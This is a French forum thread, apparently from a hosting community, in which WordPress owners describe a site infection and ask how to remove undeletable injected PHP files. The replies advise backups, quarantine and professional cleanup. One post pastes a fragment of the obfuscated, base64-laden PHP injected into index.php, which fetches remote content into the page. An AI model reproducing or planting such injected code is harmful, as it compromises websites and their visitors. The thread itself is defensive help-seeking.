Bonjour,
j'ai trouvé des fichiers génères a la racine de mon site WordPress je pense que c'etait un virus, mais le problème que je n'arrive pas a supprimer ces fichier voici l'errer affiché : Réponse : 250 OK. Current directory is / Commande : DELE efd74.php Réponse : 550 Could not delete efd74.php: No such file or directory
et mon fichier index.php a modifié par cette erreur :
\n";}else{$b2545728356=base64_decode('Lw==').$i1818946048;$m3119148441="GET $b2545728356 HTTP/1.1\r\n";$m3119148441.=base64_decode('SG9zdDogd3d3LmV4YW1wbGUuY29tDQo=');$m3119148441.=base64_decode('Q29ubmVjdGlvbjogQ2xvc2UNCg0K');fwrite($e578531298,$m3119148441);while(!feof($e578531298)){echo fgets($e578531298,128);}fclose($e578531298);}}}?>
Pour supprimer un virus, il faut suivre une procédure très très longue et très compliquée qui consiste à bloquer l'installation de wordpress en lecture seule le temps de tout vérifier et effacer le virus.
Tu peux me donner les étapes stp pour commencer
$SERVER[base64decode
Ce genre d'instructions, c'est hostile à 99,99% de probabilité.
Le mieux est de remonter un backup si vous en avez un.
Sinon refaire votre site après avoir tout effacé, si vous n'avez pas quelqu'un de TRES compétent en la matière.
2 méthodes ici :
https://community.ovhcloud.com/t/11398
Bonjour, oui j'ai un backup mais le problème que j'ai des fichiers qu'ils génèrent automatiquement et qu'on j'ai supprimé voici l'erreur affiché (550 Could not delete ifyqb.php: No such file or directory)
j'ai des fichiers qu'ils génèrent automatiquement
Rendez votre site inaccessible le temps de faire le grand ménage (par exemple en renommant le répertoire /www en /infected )
et puis faites appel à un professionnel si vous ne vous en sortez pas, sinon vous allez vous faire réinfecter tout de suite -- les pirates installent souvent des portes dérobées pour revenir quand ils veulent.
Bonjour,
et si votre site infecté de fait détecté par OVH vous allez potentiellement vous faire suspendre l'hébergement (Cf : CGU/CGV).
Cordialement, janus57
Même problème (ifyqb.php), j'ai deux sites sur un hébergement Cloud Web 1 et les deux sites piratés, 1 ne fonctionnait plus, l'autre fonctionnait encore mais des fichiers et dossiers bizarres visibles par ssh/sftp.
Heureusement j'ai des back-ups non compromis mais en essayant de supprimer le dossier complèt de l'un des sites par ssh j'ai le message d'erreur suivant :
rm: cannot remove 'site_compromis/www/94f5b5.php': Permission denied
rm: cannot remove 'site_compromis/www/godsend/dir': Permission denied
rm: cannot remove 'site_compromis/www/godsend/.htaccess': Permission denied
rm: cannot remove 'site_compromis/www/godsend/godsend.php': Permission denied
Pour ceci j'ai du changer les permissions via ssh avec la commande suivante:
chown -RPv [utilisateur]:[utilisateur] [dossier-site-compromis]
puis
rm -rf [dossier-site-compromis]
J'ai pas trop compris comment les pirates arrivent a changer les permissions de fichiers et dossiers avec du code php…
Y-a-t-il moyen de contrer ça?
Même problème (ifyqb.php), j'ai deux sites sur un hébergement Cloud Web 1 et les deux sites piratés, 1 ne fonctionnait plus, l'autre fonctionnait encore mais des fichiers et dossiers bizarres visibles par ssh/sftp.
C'est le GROS problème quans on héberge plusiers site sur un même hébergement avec un même user PHP :(
>J'ai pas trop compris comment les pirates arrivent a changer les permissions de fichiers et dossiers avec du code php...
Il existe des commandes PHP chown et chmod
Bonjour @kinxton
Créez un dossier /www/poubelle et avec FILEZILLA en mode SFTP
Glissez-y tous les dossiers et fichiers qui ne peuvent être supprimés.